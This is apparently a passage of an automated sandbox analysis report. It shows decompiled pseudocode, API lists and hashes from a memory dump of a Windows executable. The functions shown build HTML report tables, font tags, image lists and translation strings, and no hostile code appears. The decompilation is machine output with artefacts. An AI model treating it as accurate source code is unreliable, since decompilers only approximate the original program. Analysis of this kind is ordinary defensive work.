                                                                                                                                                                    				ImageList_AddMasked( *(_t62 + 0x2b0), _v1252, _v1248);
                                                                                                                                                                    				DeleteObject(_v1268);
                                                                                                                                                                    				DeleteObject(_v1268);
                                                                                                                                                                    				return SendMessageW(E00402986( *(_t62 + 0x2ac)), 0x1208, 0,  *(_t62 + 0x2b0));
                                                                                                                                                                    			}



















                                                                                                                                                                    APIs
                                                                                                                                                                    • memset.MSVCRT ref: 00409A07
                                                                                                                                                                    • memset.MSVCRT ref: 00409A1C
                                                                                                                                                                    • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A2E
                                                                                                                                                                    • SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00004001), ref: 00409A4C
                                                                                                                                                                    • ImageList_Create.COMCTL32(00000010,00000010,00000019,00000001,00000001), ref: 00409A65
                                                                                                                                                                    • ImageList_SetImageCount.COMCTL32(00000000,00000001), ref: 00409A70
                                                                                                                                                                    • SendMessageW.USER32(?,00001003,00000001,?), ref: 00409A89
                                                                                                                                                                    • ImageList_Create.COMCTL32(00000020,00000020,00000019,00000001,00000001), ref: 00409A9D
                                                                                                                                                                    • ImageList_SetImageCount.COMCTL32(00000000,00000001), ref: 00409AA8
                                                                                                                                                                    • SendMessageW.USER32(?,00001003,00000000,?), ref: 00409AC0
                                                                                                                                                                    • ImageList_Create.COMCTL32(00000010,00000010,00000019,00000001,00000001), ref: 00409ACC
                                                                                                                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 00409ADB
                                                                                                                                                                    • LoadImageW.USER32 ref: 00409AED
                                                                                                                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 00409AF8
                                                                                                                                                                    • LoadImageW.USER32 ref: 00409B0A
                                                                                                                                                                    • ImageList_SetImageCount.COMCTL32(?,00000000), ref: 00409B1B
                                                                                                                                                                    • GetSysColor.USER32(0000000F), ref: 00409B23
                                                                                                                                                                    • ImageList_AddMasked.COMCTL32(?,00000000,00000000), ref: 00409B3E
                                                                                                                                                                    • ImageList_AddMasked.COMCTL32(?,?,?), ref: 00409B4E
                                                                                                                                                                    • DeleteObject.GDI32(?), ref: 00409B5A
                                                                                                                                                                    • DeleteObject.GDI32(?), ref: 00409B60
                                                                                                                                                                    • SendMessageW.USER32(00000000,00001208,00000000,?), ref: 00409B7D
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000009.00000002.280202091.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000009.00000002.280191131.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                    • Associated: 00000009.00000002.280225522.000000000040F000.00000002.00020000.sdmp
                                                                                                                                                                    • Associated: 00000009.00000002.280236044.0000000000412000.00000004.00020000.sdmp
                                                                                                                                                                    • Associated: 00000009.00000002.280242741.0000000000414000.00000002.00020000.sdmp
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Image$List_$CountCreateMessageSend$DeleteHandleLoadMaskedModuleObjectmemset$ColorDirectoryFileInfoWindows
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 304928396-0
                                                                                                                                                                    • Opcode ID: 2f1983dae7ec13d187fd57d818e47cd18f1c9fda61e211336c08be529efc92e2
                                                                                                                                                                    • Instruction ID: 6a740ff22d918b1f3da30253e66a4340b4722f468affa3cdbe00c11f6054e755
                                                                                                                                                                    • Opcode Fuzzy Hash: 2f1983dae7ec13d187fd57d818e47cd18f1c9fda61e211336c08be529efc92e2
                                                                                                                                                                    • Instruction Fuzzy Hash: 4C419271641304BFE730AFA0DD8AF9B77A8FB48700F000839F795A51D2C7B6A8449B29
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    C-Code - Quality: 69%
                                                                                                                                                                    			E0040DC79(void* __esi, wchar_t* _a4, wchar_t* _a8) {
                                                                                                                                                                    				int _v8;
                                                                                                                                                                    				void _v518;
                                                                                                                                                                    				long _v520;
                                                                                                                                                                    				void _v1030;
                                                                                                                                                                    				char _v1032;
                                                                                                                                                                    				intOrPtr _t32;
                                                                                                                                                                    				wchar_t* _t57;
                                                                                                                                                                    				void* _t58;
                                                                                                                                                                    				void* _t59;
                                                                                                                                                                    				void* _t60;
                                                                                                                                                                    
                                                                                                                                                                    				_t58 = __esi;
                                                                                                                                                                    				_v520 = 0;
                                                                                                                                                                    				memset( &_v518, 0, 0x1fc);
                                                                                                                                                                    				_v1032 = 0;
                                                                                                                                                                    				memset( &_v1030, 0, 0x1fc);
                                                                                                                                                                    				_t60 = _t59 + 0x18;
                                                                                                                                                                    				_v8 = 1;
                                                                                                                                                                    				if( *((intOrPtr*)(__esi + 4)) == 0xffffffff &&  *((intOrPtr*)(__esi + 8)) <= 0) {
                                                                                                                                                                    					_v8 = 0;
                                                                                                                                                                    				}
                                                                                                                                                                    				_t57 = _a4;
                                                                                                                                                                    				 *_t57 = 0;
                                                                                                                                                                    				if(_v8 != 0) {
                                                                                                                                                                    					wcscpy(_t57, L"<font");
                                                                                                                                                                    					_t32 =  *((intOrPtr*)(_t58 + 8));
                                                                                                                                                                    					if(_t32 > 0) {
                                                                                                                                                                    						_push(_t32);
                                                                                                                                                                    						_push(L" size=\"%d\"");
                                                                                                                                                                    						_push(0xff);
                                                                                                                                                                    						_push( &_v520);
                                                                                                                                                                    						L0040DFD6();
                                                                                                                                                                    						wcscat(_t57,  &_v520);
                                                                                                                                                                    						_t60 = _t60 + 0x18;
                                                                                                                                                                    					}
                                                                                                                                                                    					_t33 =  *((intOrPtr*)(_t58 + 4));
                                                                                                                                                                    					if( *((intOrPtr*)(_t58 + 4)) != 0xffffffff) {
                                                                                                                                                                    						_push(E0040DBA9(_t33,  &_v1032));
                                                                                                                                                                    						_push(L" color=\"#%s\"");
                                                                                                                                                                    						_push(0xff);
                                                                                                                                                                    						_push( &_v520);
                                                                                                                                                                    						L0040DFD6();
                                                                                                                                                                    						wcscat(_t57,  &_v520);
                                                                                                                                                                    					}
                                                                                                                                                                    					wcscat(_t57, ">");
                                                                                                                                                                    				}
                                                                                                                                                                    				if( *((intOrPtr*)(_t58 + 0xc)) != 0) {
                                                                                                                                                                    					wcscat(_t57, L"<b>");
                                                                                                                                                                    				}
                                                                                                                                                                    				wcscat(_t57, _a8);
                                                                                                                                                                    				if( *((intOrPtr*)(_t58 + 0xc)) != 0) {
                                                                                                                                                                    					wcscat(_t57, L"</b>");
                                                                                                                                                                    				}
                                                                                                                                                                    				if(_v8 != 0) {
                                                                                                                                                                    					wcscat(_t57, L"</font>");
                                                                                                                                                                    				}
                                                                                                                                                                    				return _t57;
                                                                                                                                                                    			}














                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000009.00000002.280202091.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000009.00000002.280191131.0000000000400000.00000002.00020000.sdmp
• Associated: 00000009.00000002.280225522.000000000040F000.00000002.00020000.sdmp
• Associated: 00000009.00000002.280236044.0000000000412000.00000004.00020000.sdmp
• Associated: 00000009.00000002.280242741.0000000000414000.00000002.00020000.sdmp
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: wcscat$_snwprintfmemset$wcscpy
                                                                                                                                                                    • String ID: color="#%s"$ size="%d"$</b>$</font>$<b>$<font
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    C-Code - Quality: 56%
                                                                                                                                                                    			E00408C24(intOrPtr* __ebx, intOrPtr _a4, intOrPtr* _a8) {
                                                                                                                                                                    				signed int _v8;
                                                                                                                                                                    				signed int _v12;
                                                                                                                                                                    				signed short* _v16;
                                                                                                                                                                    				intOrPtr _v20;
                                                                                                                                                                    				signed int _v24;
                                                                                                                                                                    				signed int _v28;
                                                                                                                                                                    				signed int _v32;
                                                                                                                                                                    				void _v138;
                                                                                                                                                                    				long _v140;
                                                                                                                                                                    				void _v242;
                                                                                                                                                                    				char _v244;
                                                                                                                                                                    				void _v346;
                                                                                                                                                                    				char _v348;
                                                                                                                                                                    				void _v452;
                                                                                                                                                                    				void _v962;
                                                                                                                                                                    				signed short _v964;
                                                                                                                                                                    				void* __esi;
                                                                                                                                                                    				void* _t87;
                                                                                                                                                                    				wchar_t* _t109;
                                                                                                                                                                    				intOrPtr* _t124;
                                                                                                                                                                    				signed int _t125;
                                                                                                                                                                    				signed int _t140;
                                                                                                                                                                    				signed int _t151;
                                                                                                                                                                    				intOrPtr* _t152;
                                                                                                                                                                    				signed int _t154;
                                                                                                                                                                    				signed int _t155;
                                                                                                                                                                    				void* _t157;
                                                                                                                                                                    				void* _t159;
                                                                                                                                                                    
                                                                                                                                                                    				_t124 = __ebx;
                                                                                                                                                                    				_v964 = _v964 & 0x00000000;
                                                                                                                                                                    				memset( &_v962, 0, 0x1fc);
                                                                                                                                                                    				_t125 = 0x18;
                                                                                                                                                                    				memcpy( &_v452, L"<tr><td%s nowrap><b>%s</b><td bgcolor=#%s%s>%s\r\n", _t125 << 2);
                                                                                                                                                                    				asm("movsw");
                                                                                                                                                                    				_t151 = 0;
                                                                                                                                                                    				_v244 = 0;
                                                                                                                                                                    				memset( &_v242, 0, 0x62);
                                                                                                                                                                    				_v348 = 0;
                                                                                                                                                                    				memset( &_v346, 0, 0x62);
                                                                                                                                                                    				_v140 = 0;
                                                                                                                                                                    				memset( &_v138, 0, 0x62);
                                                                                                                                                                    				_t159 = _t157 + 0x3c;
                                                                                                                                                                    				_t87 =  *((intOrPtr*)( *__ebx + 0x14))();
                                                                                                                                                                    				_t128 =  *((intOrPtr*)(__ebx + 0x2e4));
                                                                                                                                                                    				_v16 =  *((intOrPtr*)(__ebx + 0x2e4));
                                                                                                                                                                    				if(_t87 != 0xffffffff) {
                                                                                                                                                                    					_t128 =  &_v964;
                                                                                                                                                                    					_push(E0040DBA9(_t87,  &_v964));
                                                                                                                                                                    					_push(L" bgcolor=\"%s\"");
                                                                                                                                                                    					_push(0x32);
                                                                                                                                                                    					_push( &_v244);
                                                                                                                                                                    					L0040DFD6();
                                                                                                                                                                    					_t159 = _t159 + 0x18;
                                                                                                                                                                    				}
                                                                                                                                                                    				E00408857(_t124, _t128, _a4, L"<table border=\"1\" cellpadding=\"5\">\r\n");
                                                                                                                                                                    				_v8 = _t151;
                                                                                                                                                                    				if( *((intOrPtr*)(_t124 + 0x34)) > _t151) {
                                                                                                                                                                    					while(1) {
                                                                                                                                                                    						_t154 =  *( *((intOrPtr*)(_t124 + 0x38)) + _v8 * 4);
                                                                                                                                                                    						_v12 = _t154;
                                                                                                                                                                    						_t155 = _t154 * 0x14;
                                                                                                                                                                    						if( *((intOrPtr*)(_t155 +  *((intOrPtr*)(_t124 + 0x48)) + 8)) != _t151) {
                                                                                                                                                                    							wcscpy( &_v140, L" nowrap");
                                                                                                                                                                    						}
                                                                                                                                                                    						_v32 = _v32 | 0xffffffff;
                                                                                                                                                                    						_v28 = _v28 | 0xffffffff;
                                                                                                                                                                    						_v24 = _v24 | 0xffffffff;
                                                                                                                                                                    						_v20 = _t151;
                                                                                                                                                                    						_t152 = _a8;
                                                                                                                                                                    						 *((intOrPtr*)( *_t124 + 0x34))(6, _v8, _t152,  &_v32);
                                                                                                                                                                    						E0040DBA9(_v32,  &_v348);
                                                                                                                                                                    						E0040DBDA( *((intOrPtr*)( *_t152))(_v12,  *((intOrPtr*)(_t124 + 0x68))),  *(_t124 + 0x6c));
                                                                                                                                                                    						 *((intOrPtr*)( *_t124 + 0x54))( *(_t124 + 0x6c), _t152, _v12);
                                                                                                                                                                    						if( *((intOrPtr*)( *_t124 + 0x18))() == 0xffffffff) {
                                                                                                                                                                    							wcscpy( *(_t124 + 0x70),  *(_t155 + _v16 + 0x10));
                                                                                                                                                                    						} else {
                                                                                                                                                                    							_push( *(_t155 + _v16 + 0x10));
                                                                                                                                                                    							_push(E0040DBA9(_t106,  &_v964));
                                                                                                                                                                    							_push(L"<font color=\"%s\">%s</font>");
                                                                                                                                                                    							_push(0x2000);
                                                                                                                                                                    							_push( *(_t124 + 0x70));
                                                                                                                                                                    							L0040DFD6();
                                                                                                                                                                    							_t159 = _t159 + 0x14;
                                                                                                                                                                    						}
                                                                                                                                                                    						_t109 =  *(_t124 + 0x6c);
                                                                                                                                                                    						_t140 =  *_t109 & 0x0000ffff;
                                                                                                                                                                    						if(_t140 == 0 || _t140 == 0x20) {
                                                                                                                                                                    							wcscat(_t109, L"&nbsp;");
                                                                                                                                                                    							_pop(_t128);
                                                                                                                                                                    						}
                                                                                                                                                                    						E0040DC79( &_v32,  *((intOrPtr*)(_t124 + 0x74)),  *(_t124 + 0x6c));
                                                                                                                                                                    						_push( *((intOrPtr*)(_t124 + 0x74)));
                                                                                                                                                                    						_push( &_v140);
                                                                                                                                                                    						_push( &_v348);
                                                                                                                                                                    						_push( *(_t124 + 0x70));
                                                                                                                                                                    						_push( &_v244);
                                                                                                                                                                    						_push( &_v452);
                                                                                                                                                                    						_push(0x2000);
                                                                                                                                                                    						_push( *((intOrPtr*)(_t124 + 0x68)));
                                                                                                                                                                    						L0040DFD6();
                                                                                                                                                                    						_t159 = _t159 + 0x28;
                                                                                                                                                                    						E00408857(_t124, _t128, _a4,  *((intOrPtr*)(_t124 + 0x68)));
                                                                                                                                                                    						_v8 = _v8 + 1;
                                                                                                                                                                    						if(_v8 >=  *((intOrPtr*)(_t124 + 0x34))) {
                                                                                                                                                                    							goto L14;
                                                                                                                                                                    						}
                                                                                                                                                                    						_t151 = 0;
                                                                                                                                                                    					}
                                                                                                                                                                    				}
                                                                                                                                                                    				L14:
                                                                                                                                                                    				E00408857(_t124, _t128, _a4, L"</table><p>");
                                                                                                                                                                    				return E00408857(_t124, _t128, _a4, L"\r\n");
                                                                                                                                                                    			}
































Memory Dump Source
• Source File: 00000009.00000002.280202091.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000009.00000002.280191131.0000000000400000.00000002.00020000.sdmp
• Associated: 00000009.00000002.280225522.000000000040F000.00000002.00020000.sdmp
• Associated: 00000009.00000002.280236044.0000000000412000.00000004.00020000.sdmp
• Associated: 00000009.00000002.280242741.0000000000414000.00000002.00020000.sdmp
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: _snwprintfmemset$wcscpy$wcscat
                                                                                                                                                                    • String ID: bgcolor="%s"$ nowrap$&nbsp;$</table><p>$<font color="%s">%s</font>$<table border="1" cellpadding="5">$<tr><td%s nowrap><b>%s</b><td bgcolor=#%s%s>%s
                                                                                                                                                                    • API String ID: 1607361635-601624466
                                                                                                                                                                    • Opcode ID: a4891ec3e285b259e5b4c97711cd0463742504ff0ef249823e507da36f033269
                                                                                                                                                                    • Instruction ID: a67fbf1fc49fec725baa5abd822cc1541e9ed8d2f41859f279ded4865cedaa1f
                                                                                                                                                                    • Opcode Fuzzy Hash: a4891ec3e285b259e5b4c97711cd0463742504ff0ef249823e507da36f033269
                                                                                                                                                                    • Instruction Fuzzy Hash: E261AC31900208AFDF24AF55CC85EAA7B79FF44310F1045BAF805BA2D2DB75AA45DB58
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    C-Code - Quality: 42%
                                                                                                                                                                    			E00409190(void* __ecx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, char _a16, char _a20, intOrPtr _a24) {
                                                                                                                                                                    				void _v514;
                                                                                                                                                                    				char _v516;
                                                                                                                                                                    				void _v1026;
                                                                                                                                                                    				long _v1028;
                                                                                                                                                                    				void _v1538;
                                                                                                                                                                    				char _v1540;
                                                                                                                                                                    				void _v2050;
                                                                                                                                                                    				char _v2052;
                                                                                                                                                                    				char _v2564;
                                                                                                                                                                    				char _v35332;
                                                                                                                                                                    				char _t51;
                                                                                                                                                                    				intOrPtr* _t54;
                                                                                                                                                                    				void* _t61;
                                                                                                                                                                    				intOrPtr* _t73;
                                                                                                                                                                    				void* _t78;
                                                                                                                                                                    				void* _t79;
                                                                                                                                                                    				void* _t80;
                                                                                                                                                                    				void* _t81;
                                                                                                                                                                    
                                                                                                                                                                    				_t75 = __ecx;
                                                                                                                                                                    				E0040E340(0x8a00, __ecx);
                                                                                                                                                                    				_v2052 = 0;
                                                                                                                                                                    				memset( &_v2050, 0, 0x1fc);
                                                                                                                                                                    				_v1540 = 0;
                                                                                                                                                                    				memset( &_v1538, 0, 0x1fc);
                                                                                                                                                                    				_v1028 = 0;
                                                                                                                                                                    				memset( &_v1026, 0, 0x1fc);
                                                                                                                                                                    				_t79 = _t78 + 0x24;
                                                                                                                                                                    				if(_a20 != 0xffffffff) {
                                                                                                                                                                    					_push(E0040DBA9(_a20,  &_v2564));
                                                                                                                                                                    					_push(L" bgcolor=\"%s\"");
                                                                                                                                                                    					_push(0xff);
                                                                                                                                                                    					_push( &_v2052);
                                                                                                                                                                    					L0040DFD6();
                                                                                                                                                                    					_t79 = _t79 + 0x18;
                                                                                                                                                                    				}
                                                                                                                                                                    				if(_a24 != 0xffffffff) {
                                                                                                                                                                    					_push(E0040DBA9(_a24,  &_v2564));
                                                                                                                                                                    					_push(L"<font color=\"%s\">");
                                                                                                                                                                    					_push(0xff);
                                                                                                                                                                    					_push( &_v1540);
                                                                                                                                                                    					L0040DFD6();
                                                                                                                                                                    					wcscpy( &_v1028, L"</font>");
                                                                                                                                                                    					_t79 = _t79 + 0x20;
                                                                                                                                                                    				}
                                                                                                                                                                    				_push( &_v2052);
                                                                                                                                                                    				_push(L"<table border=\"1\" cellpadding=\"5\"><tr%s>\r\n");
                                                                                                                                                                    				_push(0x3fff);
                                                                                                                                                                    				_push( &_v35332);
                                                                                                                                                                    				L0040DFD6();
                                                                                                                                                                    				_t80 = _t79 + 0x10;
                                                                                                                                                                    				E00408857(_a4, _t75, _a8,  &_v35332);
                                                                                                                                                                    				_t51 = _a16;
                                                                                                                                                                    				if(_t51 > 0) {
                                                                                                                                                                    					_t73 = _a12 + 4;
                                                                                                                                                                    					_a20 = _t51;
                                                                                                                                                                    					do {
                                                                                                                                                                    						_v516 = 0;
                                                                                                                                                                    						memset( &_v514, 0, 0x1fc);
                                                                                                                                                                    						_t54 =  *_t73;
                                                                                                                                                                    						_t81 = _t80 + 0xc;
                                                                                                                                                                    						if( *_t54 == 0) {
                                                                                                                                                                    							_v516 = 0;
                                                                                                                                                                    						} else {
                                                                                                                                                                    							_push(_t54);
                                                                                                                                                                    							_push(L" width=\"%s\"");
                                                                                                                                                                    							_push(0xff);
                                                                                                                                                                    							_push( &_v516);
                                                                                                                                                                    							L0040DFD6();
                                                                                                                                                                    							_t81 = _t81 + 0x10;
                                                                                                                                                                    						}
                                                                                                                                                                    						_push( &_v1028);
                                                                                                                                                                    						_push( *((intOrPtr*)(_t73 - 4)));
                                                                                                                                                                    						_push( &_v1540);
                                                                                                                                                                    						_push( &_v516);
                                                                                                                                                                    						_push(L"<th%s>%s%s%s\r\n");
                                                                                                                                                                    						_push(0x3fff);
                                                                                                                                                                    						_push( &_v35332);
                                                                                                                                                                    						L0040DFD6();
                                                                                                                                                                    						_t80 = _t81 + 0x1c;
                                                                                                                                                                    						_t61 = E00408857(_a4, _t75, _a8,  &_v35332);
                                                                                                                                                                    						_t73 = _t73 + 8;
                                                                                                                                                                    						_t36 =  &_a20;
                                                                                                                                                                    						 *_t36 = _a20 - 1;
                                                                                                                                                                    					} while ( *_t36 != 0);
                                                                                                                                                                    					return _t61;
                                                                                                                                                                    				}
                                                                                                                                                                    				return _t51;
                                                                                                                                                                    			}






















                                                                                                                                                                    APIs
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000009.00000002.280202091.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000009.00000002.280191131.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                    • Associated: 00000009.00000002.280225522.000000000040F000.00000002.00020000.sdmp
                                                                                                                                                                    • Associated: 00000009.00000002.280236044.0000000000412000.00000004.00020000.sdmp
                                                                                                                                                                    • Associated: 00000009.00000002.280242741.0000000000414000.00000002.00020000.sdmp
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: _snwprintf$memset$wcscpy
                                                                                                                                                                    • String ID: bgcolor="%s"$ width="%s"$</font>$<font color="%s">$<table border="1" cellpadding="5"><tr%s>$<th%s>%s%s%s
                                                                                                                                                                    • API String ID: 2000436516-3842416460
                                                                                                                                                                    • Opcode ID: 997443047b2d047c9c6588f338701c064b6c4b4ca7266adb085e15faabd8a24c
                                                                                                                                                                    • Instruction ID: a3c2da3f9a4e1dbf7e2b2d72e589ec7db7b3c133e798fc967c269c0974e8c497
                                                                                                                                                                    • Opcode Fuzzy Hash: 997443047b2d047c9c6588f338701c064b6c4b4ca7266adb085e15faabd8a24c
                                                                                                                                                                    • Instruction Fuzzy Hash: DD41527194021A6AEB20EE55CC41FEA737CFF45304F4444BAF909F2192E7789A548FA5
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    C-Code - Quality: 88%
                                                                                                                                                                    			E00407297(void* __ecx, void* __eflags, char _a4, wchar_t* _a8) {
                                                                                                                                                                    				void _v530;
                                                                                                                                                                    				char _v532;
                                                                                                                                                                    				void _v1042;
                                                                                                                                                                    				long _v1044;
                                                                                                                                                                    				long _v4116;
                                                                                                                                                                    				char _v5164;
                                                                                                                                                                    				void* __edi;
                                                                                                                                                                    				void* _t27;
                                                                                                                                                                    				void* _t38;
                                                                                                                                                                    				void* _t44;
                                                                                                                                                                    
                                                                                                                                                                    				E0040E340(0x142c, __ecx);
                                                                                                                                                                    				_v1044 = 0;
                                                                                                                                                                    				memset( &_v1042, 0, 0x1fc);
                                                                                                                                                                    				_v532 = 0;
                                                                                                                                                                    				memset( &_v530, 0, 0x208);
                                                                                                                                                                    				E00405800( &_v532);
                                                                                                                                                                    				_pop(_t44);
                                                                                                                                                                    				E0040674D( &_v5164);
                                                                                                                                                                    				_t27 = E0040DE36( &_v5164,  &_v532);
                                                                                                                                                                    				_t61 = _t27;
                                                                                                                                                                    				if(_t27 != 0) {
                                                                                                                                                                    					wcscpy( &_v1044,  &_v4116);
                                                                                                                                                                    					_pop(_t44);
                                                                                                                                                                    				}
                                                                                                                                                                    				wcscpy(0x412c38, _a8);
                                                                                                                                                                    				wcscpy(0x412e48, L"general");
                                                                                                                                                                    				E00406DE5(_t61, L"TranslatorName", 0x40f454, 0);
                                                                                                                                                                    				E00406DE5(_t61, L"TranslatorURL", 0x40f454, 0);
                                                                                                                                                                    				E00406DE5(_t61, L"Version",  &_v1044, 1);
                                                                                                                                                                    				E00406DE5(_t61, L"RTL", "0", 0);
                                                                                                                                                                    				_t13 =  &_a4; // 0x40743b
                                                                                                                                                                    				EnumResourceNamesW( *_t13, 4, E00407047, 0);
                                                                                                                                                                    				_t14 =  &_a4; // 0x40743b
                                                                                                                                                                    				EnumResourceNamesW( *_t14, 5, E00407047, 0);
                                                                                                                                                                    				wcscpy(0x412e48, L"strings");
                                                                                                                                                                    				_t38 = E00407170(_t44, _t61, _a4);
                                                                                                                                                                    				 *0x412c38 =  *0x412c38 & 0x00000000;
                                                                                                                                                                    				return _t38;
                                                                                                                                                                    			}














                                                                                                                                                                    APIs
                                                                                                                                                                    • memset.MSVCRT ref: 004072BD
                                                                                                                                                                    • memset.MSVCRT ref: 004072D9
                                                                                                                                                                      • Part of subcall function 00405800: GetModuleFileNameW.KERNEL32(00000000,00000208,00000104,004073D6,00000000,00407289,?,00000000,00000208,?), ref: 0040580B
                                                                                                                                                                      • Part of subcall function 0040DE36: GetFileVersionInfoSizeW.VERSION(0040730B,?,00000000), ref: 0040DE4C
                                                                                                                                                                      • Part of subcall function 0040DE36: ??2@YAPAXI@Z.MSVCRT ref: 0040DE67
                                                                                                                                                                      • Part of subcall function 0040DE36: GetFileVersionInfoW.VERSION(0040730B,00000000,?,00000000,00000000,0040730B,?,00000000), ref: 0040DE77
                                                                                                                                                                      • Part of subcall function 0040DE36: VerQueryValueW.VERSION(00000000,0040F964,0040730B,?,0040730B,00000000,?,00000000,00000000,0040730B,?,00000000), ref: 0040DE8A
                                                                                                                                                                      • Part of subcall function 0040DE36: VerQueryValueW.VERSION(00000000,\VarFileInfo\Translation,?,?,00000000,0040F964,0040730B,?,0040730B,00000000,?,00000000,00000000,0040730B,?,00000000), ref: 0040DEC7
                                                                                                                                                                      • Part of subcall function 0040DE36: _snwprintf.MSVCRT ref: 0040DEE7
                                                                                                                                                                      • Part of subcall function 0040DE36: wcscpy.MSVCRT ref: 0040DF11
                                                                                                                                                                    • wcscpy.MSVCRT ref: 0040731D
                                                                                                                                                                    • wcscpy.MSVCRT ref: 0040732C
                                                                                                                                                                    • wcscpy.MSVCRT ref: 0040733C
                                                                                                                                                                    • EnumResourceNamesW.KERNEL32(;t@,00000004,00407047,00000000), ref: 004073A1
                                                                                                                                                                    • EnumResourceNamesW.KERNEL32(?,00000005,00407047,00000000), ref: 004073AB
                                                                                                                                                                    • wcscpy.MSVCRT ref: 004073B3
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000009.00000002.280202091.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000009.00000002.280191131.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                    • Associated: 00000009.00000002.280225522.000000000040F000.00000002.00020000.sdmp
                                                                                                                                                                    • Associated: 00000009.00000002.280236044.0000000000412000.00000004.00020000.sdmp
                                                                                                                                                                    • Associated: 00000009.00000002.280242741.0000000000414000.00000002.00020000.sdmp
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: wcscpy$File$EnumInfoNamesQueryResourceValueVersionmemset$??2@ModuleNameSize_snwprintf
                                                                                                                                                                    • String ID: ;t@$H.A$RTL$TranslatorName$TranslatorURL$Version$general$strings
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    C-Code - Quality: 94%
                                                                                                                                                                    			E0040B813(intOrPtr __ecx, intOrPtr _a4, short _a8, intOrPtr _a12) {
                                                                                                                                                                    				intOrPtr _v8;
                                                                                                                                                                    				intOrPtr _v20;
                                                                                                                                                                    				void* _v24;
                                                                                                                                                                    				void* _v28;
                                                                                                                                                                    				void* __ebx;
                                                                                                                                                                    				void* __esi;
                                                                                                                                                                    				void* _t60;
                                                                                                                                                                    				intOrPtr _t64;
                                                                                                                                                                    				intOrPtr _t66;
                                                                                                                                                                    				void* _t69;
                                                                                                                                                                    				void* _t75;
                                                                                                                                                                    				void* _t97;
                                                                                                                                                                    				signed int _t105;
                                                                                                                                                                    				void* _t108;
                                                                                                                                                                    				intOrPtr _t115;
                                                                                                                                                                    				signed char _t120;
                                                                                                                                                                    				signed int _t124;
                                                                                                                                                                    				intOrPtr _t129;
                                                                                                                                                                    				intOrPtr _t131;
                                                                                                                                                                    				intOrPtr* _t134;
                                                                                                                                                                    				signed int _t136;
                                                                                                                                                                    				void* _t139;
                                                                                                                                                                    
                                                                                                                                                                    				_t129 = __ecx;
                                                                                                                                                                    				_t118 = _a4;
                                                                                                                                                                    				_t139 = _t118 - 0x402;
                                                                                                                                                                    				_v8 = __ecx;
                                                                                                                                                                    				if(_t139 > 0) {
                                                                                                                                                                    					_t60 = _t118 - 0x415;
                                                                                                                                                                    					__eflags = _t60;
                                                                                                                                                                    					if(_t60 == 0) {
                                                                                                                                                                    						E0040A459(__ecx);
                                                                                                                                                                    						_t132 = _t129;
                                                                                                                                                                    						L31:
                                                                                                                                                                    						__eflags = 0;
                                                                                                                                                                    						E0040A1DC(0, _t118, _t132, 0);
                                                                                                                                                                    						L32:
                                                                                                                                                                    						_t64 =  *((intOrPtr*)(_t129 + 0x6a0));
                                                                                                                                                                    						if(_t64 != 0 && _a4 == _t64) {
                                                                                                                                                                    							_t127 = _a12;
                                                                                                                                                                    							_t120 =  *(_a12 + 0xc);
                                                                                                                                                                    							_t148 = _t120 & 0x00000008;
                                                                                                                                                                    							_t66 =  *((intOrPtr*)(_t129 + 0x69c));
                                                                                                                                                                    							if((_t120 & 0x00000008) == 0) {
                                                                                                                                                                    								__eflags = _t120 & 0x00000040;
                                                                                                                                                                    								if((_t120 & 0x00000040) != 0) {
                                                                                                                                                                    									 *0x412c2c =  *0x412c2c & 0x00000000;
                                                                                                                                                                    									__eflags =  *0x412c2c;
                                                                                                                                                                    									E004077CB(_t66);
                                                                                                                                                                    								}
                                                                                                                                                                    							} else {
                                                                                                                                                                    								E0040990D(_t66, _t148, _t127);
                                                                                                                                                                    							}
                                                                                                                                                                    						}
                                                                                                                                                                    						return E00401B1E(_t129, _a4, _a8, _a12);
                                                                                                                                                                    					}
                                                                                                                                                                    					_t69 = _t60 - 1;
                                                                                                                                                                    					__eflags = _t69;
                                                                                                                                                                    					if(_t69 == 0) {
                                                                                                                                                                    						_t134 = __ecx + 0x69c;
                                                                                                                                                                    						 *((intOrPtr*)( *((intOrPtr*)( *_t134)) + 0x68))();
                                                                                                                                                                    						_t118 =  *_t134;
                                                                                                                                                                    						 *((intOrPtr*)( *((intOrPtr*)( *_t134)) + 0x80))(0);
                                                                                                                                                                    						L22:
                                                                                                                                                                    						_t132 = _t129;
                                                                                                                                                                    						E0040A3BF(_t129);
                                                                                                                                                                    						goto L31;
                                                                                                                                                                    					}
                                                                                                                                                                    					_t75 = _t69 - 0x12;
                                                                                                                                                                    					__eflags = _t75;
                                                                                                                                                                    					if(__eflags == 0) {
